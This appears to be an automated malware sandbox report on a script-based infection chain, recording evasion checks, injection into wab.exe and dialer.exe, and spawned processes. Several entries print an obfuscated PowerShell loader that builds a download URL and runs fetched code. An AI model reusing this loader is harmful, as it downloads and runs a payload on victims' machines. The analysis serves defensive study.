                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\dialer.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\dialer.exe Process information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    Source: C:\Program Files (x86)\Windows Mail\wab.exe API/Special instruction interceptor: Address: 590DFF3
                    Source: C:\Program Files (x86)\Windows Mail\wab.exe API/Special instruction interceptor: Address: 7FF8C88ED044
                    Source: C:\Windows\SysWOW64\dialer.exe API/Special instruction interceptor: Address: 7FF8C88ED044
                    Source: C:\Windows\SysWOW64\dialer.exe API/Special instruction interceptor: Address: 597483A
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4303
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5573
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8258
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1433
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6620 Thread sleep time: -4611686018427385s >= -30000s
                    Source: C:\Windows\System32\svchost.exe TID: 1020 Thread sleep time: -30000s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6204 Thread sleep count: 8258 > 30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1276 Thread sleep count: 1433 > 30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3376 Thread sleep time: -3689348814741908s >= -30000s
                    Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
                    Source: C:\Windows\SysWOW64\dialer.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                    Source: wscript.exe, 00000000.00000003.2050027325.000001888831C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: wab.exe, 00000007.00000003.2574777767.00000000254D0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: DisableGuestVmNetworkConnectivity
                    Source: svchost.exe, 00000004.00000002.3341191291.000002A79CE5A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3339787884.000002A79782B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3339831570.000002A797843000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                    Source: wab.exe, 00000007.00000003.2574777767.00000000254D0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: EnableGuestVmNetworkConnectivity
                    Source: wab.exe, 00000007.00000002.2594065641.0000000008902000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWhM
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
                    Source: C:\Windows\SysWOW64\dialer.exe Code function: 9_3_032B027F mov eax, dword ptr fs:[00000030h] 9_3_032B027F

                    HIPS / PFW / Operating System Protection Evasion

                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 4030000
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: A7FAEC
                    Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function Krse ($Udrensnri){For($Holdk=7; $Holdk -lt $Udrensnri.Length-1; $Holdk+=8){ $bekraefte+=$Udrensnri.Substring($Holdk, 1);}$bekraefte;}$bekraefte01=Krse 'Unrelini SouffleRovsedexHinchmi ';$bekraefte02=Krse 'AllitteTLgninger NonminaSnorkelnDrawplasHydrostfCodificeAchiertrBindheirkarnevai QuadrinRegressgProphet ';function Fundmong ($Avoutry){. ($bekraefte01) ($Avoutry);}$Jaspedam82=Krse 'CelebrehStenklvtDybdemat Expetipsemidels Blackl: Bemest/Bromidi/CandollwPlateaswrochetswDrtrinn.RefereraUtaethes SteurotFantasteDalliannLeafedstTilbageeHyperacrPremillp OddfelrIronikeiFunderes ForlageLocomots nonaff.SubtotacVarmefroCreaminmPlatypt.FormatkplibidinkSandsyn/RebozotmKimsendsBygning/BaggaarS OvertepKistegleUninundjMeedful.Ideologt TenuirtTuckykof Overen ';$bekraefte00=Krse 'approks$ SternngGynecollRoofwisoTaipoclbbetonrkaLogopedlFloddel:BacilleCTransforKlemskruYnkvrdisPartakiaInitiald KodifioDonskywvBloodthaTyggende Stykvr8nonvend Melone= Forste DecolonS AlphabtMinikenaForhaanrGeneralt Plasmo-IndfrelBAvlsbruiDvrgeflt AbdelrsNerviikTForslver Pederaa SubternHeadless Hilsepf HundreeRsknernr Unphil Rokkene-MystifiS OverfloFrembriuEconomir SignalcLuftrrbeVarmeis Crotche$AmtskomJSiddebaaAssembls PlastipParvifoe Tiltogd BoundlaBestialmPemmica8Angribe2Toiletp encomi-ArveretDstuppeneBibabudsMotionetLandfogiResentsnaktiekaaSupersatUnderstipathletoSjllandnforlyst Praktis$SammenbCBeechamrIrongoluFunestasSchlossaPestersdJgerstuo NonprovNonpessaRationae Cofoun2Spaecra ';Fundmong (Krse 'Omfangs$TumultegGaardsplPastieroUrbiaspbindpakkaSymfonilafdrags:AcolhuaCAfspndirCarlineuModellesFlgenesaFalanksd BommenoKaffetivMultiplaBekmpelePerpetu2Promisi=Imitato$ProduktePurgatinIncomprvSulfini: KartotaNonintepPersillp BeaverdVildepraFolacintFugersoaMispris ') ;Fundmong (Krse 
'AfbenytIFalderamSlingrepturbehsoCryptohrPanicketEtagese-GeograpMUnarbitoUafvised Erstatu Biscayl Pimpere Parado OutmarrBUntrammiAfgudentresultasFlerbruTStansemrSvineavachurnfunOptjercsVedtagefRedecideKikrterrAfhvlin ') ;$Crusadovae2=$Crusadovae2+'\Notorhiza.Sal' ;Fundmong (Krse ' slambr$DebusedgGlobatel Telpheo AnskuebFlagstraEbbcritlKokseth:rredtekC limfarrMslsveru RutsjesAabjrnsaRestipud Prefoco CandidvAgrarkoaDespitoeDeceler7Mashall=imperfo(GuslarpTLovforbeGilenorsChloroptUnbelie-PleurahPPreasceaStillelt ForklahMerceri Corrive$AugustoCUdhamrircosmeteuSelskabsGallakla PillerdOpsadleoRosethavAntbirdaSvingnietrawled2Hippocr)Fairlea ') ;while (-not $Crusadovae7) {Fundmong (Krse 'DiscernISpreneufLegende Sulphoh(Waggonl$eksplosCPyramidrInverseu LepilespaltereaTidsskrdDriftskoWhiterovSpirantaMeasurieUnlovea8Dkliste.TumlersJ securioKryptonbCifferlSSwollentSkifertaSandormtRedeploeHvorind Smykken-ChambereSkebladqfyrsted Biestin$Kahytsjb Atommie AktivikStilkunrKatapulaNapoleoeLykkebrfProtoprtSpearmieDriftsr0Udsprjt2tankefu) Nbbene Jamaic{BeskrivS Despott MamushaIrradiarHalvbrotEthenoi-Br
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "Function Krse ($Udrensnri){For($Holdk=7; $Holdk -lt $Udrensnri.Length-1; $Holdk+=8){ $bekraefte+=$Udrensnri.Substring($Holdk, 1);}$bekraefte;}$bekraefte01=Krse 'Unrelini SouffleRovsedexHinchmi ';$bekraefte02=Krse 'AllitteTLgninger NonminaSnorkelnDrawplasHydrostfCodificeAchiertrBindheirkarnevai QuadrinRegressgProphet ';function Fundmong ($Avoutry){. ($bekraefte01) ($Avoutry);}$Jaspedam82=Krse 'CelebrehStenklvtDybdemat Expetipsemidels Blackl: Bemest/Bromidi/CandollwPlateaswrochetswDrtrinn.RefereraUtaethes SteurotFantasteDalliannLeafedstTilbageeHyperacrPremillp OddfelrIronikeiFunderes ForlageLocomots nonaff.SubtotacVarmefroCreaminmPlatypt.FormatkplibidinkSandsyn/RebozotmKimsendsBygning/BaggaarS OvertepKistegleUninundjMeedful.Ideologt TenuirtTuckykof Overen ';$bekraefte00=Krse 'approks$ SternngGynecollRoofwisoTaipoclbbetonrkaLogopedlFloddel:BacilleCTransforKlemskruYnkvrdisPartakiaInitiald KodifioDonskywvBloodthaTyggende Stykvr8nonvend Melone= Forste DecolonS AlphabtMinikenaForhaanrGeneralt Plasmo-IndfrelBAvlsbruiDvrgeflt AbdelrsNerviikTForslver Pederaa SubternHeadless Hilsepf HundreeRsknernr Unphil Rokkene-MystifiS OverfloFrembriuEconomir SignalcLuftrrbeVarmeis Crotche$AmtskomJSiddebaaAssembls PlastipParvifoe Tiltogd BoundlaBestialmPemmica8Angribe2Toiletp encomi-ArveretDstuppeneBibabudsMotionetLandfogiResentsnaktiekaaSupersatUnderstipathletoSjllandnforlyst Praktis$SammenbCBeechamrIrongoluFunestasSchlossaPestersdJgerstuo NonprovNonpessaRationae Cofoun2Spaecra ';Fundmong (Krse 'Omfangs$TumultegGaardsplPastieroUrbiaspbindpakkaSymfonilafdrags:AcolhuaCAfspndirCarlineuModellesFlgenesaFalanksd BommenoKaffetivMultiplaBekmpelePerpetu2Promisi=Imitato$ProduktePurgatinIncomprvSulfini: KartotaNonintepPersillp BeaverdVildepraFolacintFugersoaMispris ') ;Fundmong 
(Krse 'AfbenytIFalderamSlingrepturbehsoCryptohrPanicketEtagese-GeograpMUnarbitoUafvised Erstatu Biscayl Pimpere Parado OutmarrBUntrammiAfgudentresultasFlerbruTStansemrSvineavachurnfunOptjercsVedtagefRedecideKikrterrAfhvlin ') ;$Crusadovae2=$Crusadovae2+'\Notorhiza.Sal' ;Fundmong (Krse ' slambr$DebusedgGlobatel Telpheo AnskuebFlagstraEbbcritlKokseth:rredtekC limfarrMslsveru RutsjesAabjrnsaRestipud Prefoco CandidvAgrarkoaDespitoeDeceler7Mashall=imperfo(GuslarpTLovforbeGilenorsChloroptUnbelie-PleurahPPreasceaStillelt ForklahMerceri Corrive$AugustoCUdhamrircosmeteuSelskabsGallakla PillerdOpsadleoRosethavAntbirdaSvingnietrawled2Hippocr)Fairlea ') ;while (-not $Crusadovae7) {Fundmong (Krse 'DiscernISpreneufLegende Sulphoh(Waggonl$eksplosCPyramidrInverseu LepilespaltereaTidsskrdDriftskoWhiterovSpirantaMeasurieUnlovea8Dkliste.TumlersJ securioKryptonbCifferlSSwollentSkifertaSandormtRedeploeHvorind Smykken-ChambereSkebladqfyrsted Biestin$Kahytsjb Atommie AktivikStilkunrKatapulaNapoleoeLykkebrfProtoprtSpearmieDriftsr0Udsprjt2tankefu) Nbbene Jamaic{BeskrivS Despott MamushaIrradiarHalvbrotEthenoi-Br
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
                    Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Windows\SysWOW64\dialer.exe "C:\Windows\system32\dialer.exe"
                    Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "function krse ($udrensnri){for($holdk=7; $holdk -lt $udrensnri.length-1; $holdk+=8){ $bekraefte+=$udrensnri.substring($holdk, 1);}$bekraefte;}$bekraefte01=krse 'unrelini soufflerovsedexhinchmi ';$bekraefte02=krse 'allittetlgninger nonminasnorkelndrawplashydrostfcodificeachiertrbindheirkarnevai quadrinregressgprophet ';function fundmong ($avoutry){. ($bekraefte01) ($avoutry);}$jaspedam82=krse 'celebrehstenklvtdybdemat expetipsemidels blackl: bemest/bromidi/candollwplateaswrochetswdrtrinn.refererautaethes steurotfantastedalliannleafedsttilbageehyperacrpremillp oddfelrironikeifunderes forlagelocomots nonaff.subtotacvarmefrocreaminmplatypt.formatkplibidinksandsyn/rebozotmkimsendsbygning/baggaars overtepkistegleuninundjmeedful.ideologt tenuirttuckykof overen ';$bekraefte00=krse 'approks$ sternnggynecollroofwisotaipoclbbetonrkalogopedlfloddel:bacillectransforklemskruynkvrdispartakiainitiald kodifiodonskywvbloodthatyggende stykvr8nonvend melone= forste decolons alphabtminikenaforhaanrgeneralt plasmo-indfrelbavlsbruidvrgeflt abdelrsnerviiktforslver pederaa subternheadless hilsepf hundreersknernr unphil rokkene-mystifis overflofrembriueconomir signalcluftrrbevarmeis crotche$amtskomjsiddebaaassembls plastipparvifoe tiltogd boundlabestialmpemmica8angribe2toiletp encomi-arveretdstuppenebibabudsmotionetlandfogiresentsnaktiekaasupersatunderstipathletosjllandnforlyst praktis$sammenbcbeechamrirongolufunestasschlossapestersdjgerstuo nonprovnonpessarationae cofoun2spaecra ';fundmong (krse 'omfangs$tumulteggaardsplpastierourbiaspbindpakkasymfonilafdrags:acolhuacafspndircarlineumodellesflgenesafalanksd bommenokaffetivmultiplabekmpeleperpetu2promisi=imitato$produktepurgatinincomprvsulfini: kartotanoninteppersillp beaverdvildeprafolacintfugersoamispris ') ;fundmong (krse 
'afbenytifalderamslingrepturbehsocryptohrpanicketetagese-geograpmunarbitouafvised erstatu biscayl pimpere parado outmarrbuntrammiafgudentresultasflerbrutstansemrsvineavachurnfunoptjercsvedtagefredecidekikrterrafhvlin ') ;$crusadovae2=$crusadovae2+'\notorhiza.sal' ;fundmong (krse ' slambr$debusedgglobatel telpheo anskuebflagstraebbcritlkokseth:rredtekc limfarrmslsveru rutsjesaabjrnsarestipud prefoco candidvagrarkoadespitoedeceler7mashall=imperfo(guslarptlovforbegilenorschloroptunbelie-pleurahppreasceastillelt forklahmerceri corrive$augustocudhamrircosmeteuselskabsgallakla pillerdopsadleorosethavantbirdasvingnietrawled2hippocr)fairlea ') ;while (-not $crusadovae7) {fundmong (krse 'discernispreneuflegende sulphoh(waggonl$eksploscpyramidrinverseu lepilespaltereatidsskrddriftskowhiterovspirantameasurieunlovea8dkliste.tumlersj securiokryptonbcifferlsswollentskifertasandormtredeploehvorind smykken-chambereskebladqfyrsted biestin$kahytsjb atommie aktivikstilkunrkatapulanapoleoelykkebrfprotoprtspearmiedriftsr0udsprjt2tankefu) nbbene jamaic{beskrivs despott mamushairradiarhalvbrotethenoi-br
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "function krse ($udrensnri){for($holdk=7; $holdk -lt $udrensnri.length-1; $holdk+=8){ $bekraefte+=$udrensnri.substring($holdk, 1);}$bekraefte;}$bekraefte01=krse 'unrelini soufflerovsedexhinchmi ';$bekraefte02=krse 'allittetlgninger nonminasnorkelndrawplashydrostfcodificeachiertrbindheirkarnevai quadrinregressgprophet ';function fundmong ($avoutry){. ($bekraefte01) ($avoutry);}$jaspedam82=krse 'celebrehstenklvtdybdemat expetipsemidels blackl: bemest/bromidi/candollwplateaswrochetswdrtrinn.refererautaethes steurotfantastedalliannleafedsttilbageehyperacrpremillp oddfelrironikeifunderes forlagelocomots nonaff.subtotacvarmefrocreaminmplatypt.formatkplibidinksandsyn/rebozotmkimsendsbygning/baggaars overtepkistegleuninundjmeedful.ideologt tenuirttuckykof overen ';$bekraefte00=krse 'approks$ sternnggynecollroofwisotaipoclbbetonrkalogopedlfloddel:bacillectransforklemskruynkvrdispartakiainitiald kodifiodonskywvbloodthatyggende stykvr8nonvend melone= forste decolons alphabtminikenaforhaanrgeneralt plasmo-indfrelbavlsbruidvrgeflt abdelrsnerviiktforslver pederaa subternheadless hilsepf hundreersknernr unphil rokkene-mystifis overflofrembriueconomir signalcluftrrbevarmeis crotche$amtskomjsiddebaaassembls plastipparvifoe tiltogd boundlabestialmpemmica8angribe2toiletp encomi-arveretdstuppenebibabudsmotionetlandfogiresentsnaktiekaasupersatunderstipathletosjllandnforlyst praktis$sammenbcbeechamrirongolufunestasschlossapestersdjgerstuo nonprovnonpessarationae cofoun2spaecra ';fundmong (krse 'omfangs$tumulteggaardsplpastierourbiaspbindpakkasymfonilafdrags:acolhuacafspndircarlineumodellesflgenesafalanksd bommenokaffetivmultiplabekmpeleperpetu2promisi=imitato$produktepurgatinincomprvsulfini: kartotanoninteppersillp beaverdvildeprafolacintfugersoamispris ') ;fundmong 
(krse 'afbenytifalderamslingrepturbehsocryptohrpanicketetagese-geograpmunarbitouafvised erstatu biscayl pimpere parado outmarrbuntrammiafgudentresultasflerbrutstansemrsvineavachurnfunoptjercsvedtagefredecidekikrterrafhvlin ') ;$crusadovae2=$crusadovae2+'\notorhiza.sal' ;fundmong (krse ' slambr$debusedgglobatel telpheo anskuebflagstraebbcritlkokseth:rredtekc limfarrmslsveru rutsjesaabjrnsarestipud prefoco candidvagrarkoadespitoedeceler7mashall=imperfo(guslarptlovforbegilenorschloroptunbelie-pleurahppreasceastillelt forklahmerceri corrive$augustocudhamrircosmeteuselskabsgallakla pillerdopsadleorosethavantbirdasvingnietrawled2hippocr)fairlea ') ;while (-not $crusadovae7) {fundmong (krse 'discernispreneuflegende sulphoh(waggonl$eksploscpyramidrinverseu lepilespaltereatidsskrddriftskowhiterovspirantameasurieunlovea8dkliste.tumlersj securiokryptonbcifferlsswollentskifertasandormtredeploehvorind smykken-chambereskebladqfyrsted biestin$kahytsjb atommie aktivikstilkunrkatapulanapoleoelykkebrfprotoprtspearmiedriftsr0udsprjt2tankefu) nbbene jamaic{beskrivs despott mamushairradiarhalvbrotethenoi-br
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "function krse ($udrensnri){for($holdk=7; $holdk -lt $udrensnri.length-1; $holdk+=8){ $bekraefte+=$udrensnri.substring($holdk, 1);}$bekraefte;}$bekraefte01=krse 'unrelini soufflerovsedexhinchmi ';$bekraefte02=krse 'allittetlgninger nonminasnorkelndrawplashydrostfcodificeachiertrbindheirkarnevai quadrinregressgprophet ';function fundmong ($avoutry){. ($bekraefte01) ($avoutry);}$jaspedam82=krse 'celebrehstenklvtdybdemat expetipsemidels blackl: bemest/bromidi/candollwplateaswrochetswdrtrinn.refererautaethes steurotfantastedalliannleafedsttilbageehyperacrpremillp oddfelrironikeifunderes forlagelocomots nonaff.subtotacvarmefrocreaminmplatypt.formatkplibidinksandsyn/rebozotmkimsendsbygning/baggaars overtepkistegleuninundjmeedful.ideologt tenuirttuckykof overen ';$bekraefte00=krse 'approks$ sternnggynecollroofwisotaipoclbbetonrkalogopedlfloddel:bacillectransforklemskruynkvrdispartakiainitiald kodifiodonskywvbloodthatyggende stykvr8nonvend melone= forste decolons alphabtminikenaforhaanrgeneralt plasmo-indfrelbavlsbruidvrgeflt abdelrsnerviiktforslver pederaa subternheadless hilsepf hundreersknernr unphil rokkene-mystifis overflofrembriueconomir signalcluftrrbevarmeis crotche$amtskomjsiddebaaassembls plastipparvifoe tiltogd boundlabestialmpemmica8angribe2toiletp encomi-arveretdstuppenebibabudsmotionetlandfogiresentsnaktiekaasupersatunderstipathletosjllandnforlyst praktis$sammenbcbeechamrirongolufunestasschlossapestersdjgerstuo nonprovnonpessarationae cofoun2spaecra ';fundmong (krse 'omfangs$tumulteggaardsplpastierourbiaspbindpakkasymfonilafdrags:acolhuacafspndircarlineumodellesflgenesafalanksd bommenokaffetivmultiplabekmpeleperpetu2promisi=imitato$produktepurgatinincomprvsulfini: kartotanoninteppersillp beaverdvildeprafolacintfugersoamispris ') ;fundmong (krse 
